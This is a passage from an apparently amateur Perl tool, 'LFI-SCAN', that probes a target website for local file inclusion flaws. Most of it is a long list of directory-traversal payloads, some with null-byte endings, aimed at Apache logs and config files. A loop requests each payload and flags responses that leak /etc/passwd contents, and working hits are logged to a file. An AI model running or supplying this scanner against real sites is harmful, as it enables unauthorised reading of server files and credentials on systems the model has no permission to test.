'/var/log/httpd/error_log%00',
'../var/log/httpd/error_log%00',
'../../var/log/httpd/error_log%00',
'../../../var/log/httpd/error_log%00',
'../../../../var/log/httpd/error_log%00',
'../../../../../var/log/httpd/error_log%00',
'../../../../../../var/log/httpd/error_log%00',
'../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../var/log/httpd/error_log%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'/etc/httpd/conf/httpd.conf',
'../etc/httpd/conf/httpd.conf',
'../../etc/httpd/conf/httpd.conf',
'../../../etc/httpd/conf/httpd.conf',
'../../../../etc/httpd/conf/httpd.conf',
'../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf%00',
'../etc/httpd/conf/httpd.conf%00',
'../../etc/httpd/conf/httpd.conf%00',
'../../../etc/httpd/conf/httpd.conf%00',
'../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'/etc/apache/conf/httpd.conf',
'../etc/apache/conf/httpd.conf',
'../../etc/apache/conf/httpd.conf',
'../../../etc/apache/conf/httpd.conf',
'../../../../etc/apache/conf/httpd.conf',
'../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../../etc/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf%00',
'../etc/apache/conf/httpd.conf%00',
'../../etc/apache/conf/httpd.conf%00',
'../../../etc/apache/conf/httpd.conf%00',
'../../../../etc/apache/conf/httpd.conf%00',
'../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'/usr/local/etc/apache/conf/httpd.conf',
'../usr/local/etc/apache/conf/httpd.conf',
'../../usr/local/etc/apache/conf/httpd.conf',
'../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf%00',
'../usr/local/etc/apache/conf/httpd.conf%00',
'../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'/etc/apache2/httpd.conf',
'../etc/apache2/httpd.conf',
'../../etc/apache2/httpd.conf',
'../../../etc/apache2/httpd.conf',
'../../../../etc/apache2/httpd.conf',
'../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../../etc/apache2/httpd.conf',
'/etc/apache2/httpd.conf%00',
'../etc/apache2/httpd.conf%00',
'../../etc/apache2/httpd.conf%00',
'../../../etc/apache2/httpd.conf%00',
'../../../../etc/apache2/httpd.conf%00',
'../../../../../etc/apache2/httpd.conf%00',
'../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../../etc/apache2/httpd.conf%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');

print "> scan starting...\n";
open (FICHIER, ">>list_LFI.txt") || die ("Permission Denied \"fichier.txt\"");
print FICHIER "list of working LFI :\n";

$trig = "NO LFI FOUND ....";
foreach $scan(@vuls){
	# print "$scan";
	$url = $link.$scan;
	$request = HTTP::Request->new(GET=>$url);
	$useragent = LWP::UserAgent->new();
	$response = $useragent->request($request);

	if ($response->is_success && $response->content =~ /root:x:/) { 
		$msg = "Something here !"; 
		$trig ="[ LFI FOUND ] !!! \nsee list_LFI.txt file !!! ";
		# Création du fichier 'fichier.txt'
		open (FICHIER, ">>list_LFI.txt") || die ("Permission Denied \"fichier.txt\"");
		# On écrit dans le fichier...
		print FICHIER "$link$scan\n";
		close (FICHIER);}

	else { 
		$msg = "Nothing here";
}



print "     ==========================================================================\n";
print "    |      _     _____ ___     ____   ____    _    _   _         _   ___       |\n";
print "    |     | |   |  ___|_ _|   / ___| / ___|  / \\  | \\ | | __   _/ | / _ \\      |\n";
print "    |     | |   | |_   | |____\\___ \\| |     / _ \\ |  \\| | \\ \\ / / || | | |     |\n";
print "    |     | |___|  _|  | |_____|__) | |___ / ___ \\| |\\  |  \\ V /| || |_| |     |\n";
print "    |     |_____|_|   |___|   |____/ \\____/_/   \\_\\_| \\_|   \\_/ |_(_)___/      |\n";
print "    |                                                                          |\n";
print "     =============================by 7h30th3r0n3===============================\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";






print "processing... \n";
print "\n";
print "link : $link \n";
print "\n";
print "payload : $scan\n \n         [ $msg ]\n";

print "\n$trig \n";

print "\033[2J"; 
print "\033[0;0H"; }


print "     ==========================================================================\n";
print "    |      _     _____ ___     ____   ____    _    _   _         _   ___       |\n";
print "    |     | |   |  ___|_ _|   / ___| / ___|  / \\  | \\ | | __   _/ | / _ \\      |\n";
print "    |     | |   | |_   | |____\\___ \\| |     / _ \\ |  \\| | \\ \\ / / || | | |     |\n";
print "    |     | |___|  _|  | |_____|__) | |___ / ___ \\| |\\  |  \\ V /| || |_| |     |\n";
print "    |     |_____|_|   |___|   |____/ \\____/_/   \\_\\_| \\_|   \\_/ |_(_)___/      |\n";
print "    |                                                                          |\n";
print "     =============================by 7h30th3r0n3===============================\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n$trig \n";

#EOF
 


